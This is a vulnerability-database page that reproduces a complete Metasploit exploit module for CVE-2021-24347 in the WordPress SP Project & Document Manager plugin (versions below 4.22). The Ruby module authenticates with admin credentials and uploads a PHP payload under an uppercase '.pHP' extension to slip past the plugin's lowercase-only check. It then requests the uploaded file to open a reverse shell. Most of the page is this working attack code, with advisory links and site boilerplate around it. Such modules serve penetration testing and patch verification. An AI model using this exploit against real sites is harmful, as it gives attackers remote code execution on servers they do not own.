Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress SP Project And Document Remote Code Execution Exploit

🗓️ 26 Jul 2021 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 184 Views

Wordpress SP Project and Document - Authenticated Remote Code Execution. Allows privileged account to launch a reverse shell via arbitrary file upload. Security check overlooks uppercase file extensions

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Wordpress SP Project & Document Manager 4.21 Plugin - Remote Code Execution Exploit
8 Jul 202100:00
zdt
Circl		CVE-2021-24347
10 Jul 202116:29
circl
CNNVD		WordPress 代码注入漏洞
14 Jun 202100:00
cnnvd
Check Point Advisories		p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347)
19 Oct 202100:00
checkpoint_advisories
CVE		CVE-2021-24347
14 Jun 202113:37
cve
Cvelist		CVE-2021-24347 SP Project & Document Manager <2 4.22 - Authenticated Shell Upload
14 Jun 202113:37
cvelist
Exploit DB		Wordpress Plugin SP Project &amp; Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)
8 Jul 202100:00
exploitdb
Metasploit		Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution
24 Jul 202117:50
metasploit
Nuclei		WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
9 Jun 202605:43
nuclei
NVD		CVE-2021-24347
14 Jun 202114:15
nvd
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin SP Project and Document - Authenticated Remote Code Execution',
        'Description' => %q{
          This module allows an attacker with a privileged Wordpress account to launch a reverse shell
          due to an arbitrary file upload vulnerability in Wordpress plugin SP Project & Document < 4.22.
          The security check only searches for lowercase file extensions such as `.php`, making it possible to upload `.pHP` files for instance.
          Finally, the uploaded payload can be triggered by a call to `/wp-content/uploads/sp-client-document-manager/<user_id>/<random_payload_name>.php`
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Ron Jost', # Exploit-db
            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
          ],
        'References' =>
          [
            ['EDB', '50115'],
            ['CVE', '2021-24347']
          ],
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' =>
        [
          ['Wordpress SP Project & Document < 4.22', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2021-06-14',
        'Notes' =>
          {
            'Stability' => [CRASH_SAFE],
            'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
            'Reliability' => [REPEATABLE_SESSION]
          }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])
    ]
  end

  def check
    return CheckCode::Unknown('Server not online or not detected as wordpress') unless wordpress_and_online?

    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    if cookie
      check_plugin_version_from_readme('sp-client-document-manager', '4.22')
    else
      CheckCode::Detected('The admin credentials given are wrong !')
    end
  end

  def get_user_id(cookie)
    r = send_request_cgi({
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'Referer' => full_uri('/wp-admin/users.php'),
      'vars_get' => {
        'page' => 'sp-client-document-manager-fileview'
      }
    })
    fail_with(Failure::Unknown, "Target #{RHOST} could not be reached.") unless r
    user_id = r.body.to_s.match(%r{<option value='(\d+)'>#{datastore['USERNAME']}</option>})
    fail_with(Failure::UnexpectedReply, "Can't find user id on plugin page") unless user_id && user_id[1]
    user_id[1]
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie
    user_id = get_user_id(cookie)
    payload_name = "#{Rex::Text.rand_text_alpha_lower(5)}.pHP"
    post_data = Rex::MIME::Message.new
    post_data.add_part(Rex::Text.rand_text_alpha(5..8), nil, nil, "form-data; name='cdm_upload_file_field'")
    post_data.add_part("/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=#{user_id}", nil, nil, "form-data; name='_wp_http_referer'")
    post_data.add_part('exploits', nil, nil, "form-data; name='dlg-upload-name'")
    post_data.add_part('', 'application/octet-stream', nil, "form-data; name='dlg-upload-file[]'; filename=''")
    post_data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name='dlg-upload-file[]'; filename='#{payload_name}'")
    post_data.add_part('', nil, nil, "form-data; name='dlg-upload-notes'")
    post_data.add_part('Upload', nil, nil, "form-data; name='sp-cdm-community-upload'")

    print_status("Uploading file \'#{payload_name}\' containing the payload...")

    r = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),
      'headers' => {
        'Origin' => full_uri(''),
        'Referer' => full_uri('wp-admin/admin.php')
      },
      'vars_get' => {
        'page' => 'sp-client-document-manager-fileview',
        'id' => user_id
      },
      'cookie' => cookie,
      'data' => post_data.to_s,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    )

    fail_with(Failure::UnexpectedReply, "Wasn't able to upload the payload file") unless r&.code == 302
    register_files_for_cleanup(payload_name.downcase)

    print_status('Triggering the payload ...')

    send_request_cgi(
      'method' => 'GET',
      'cookie' => cookie,
      'uri' => normalize_uri(target_uri.path, "/wp-content/uploads/sp-client-document-manager/#{user_id}/#{payload_name.downcase}")
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jul 2021 00:00Current
CVSS 26.5
CVSS 3.18.8
EPSS0.80599
wordpresssp projectdocumentremote code executionmetasploitarbitrary file uploadprivileged accountsecurity checkreverse shellfile extension vulnerability
184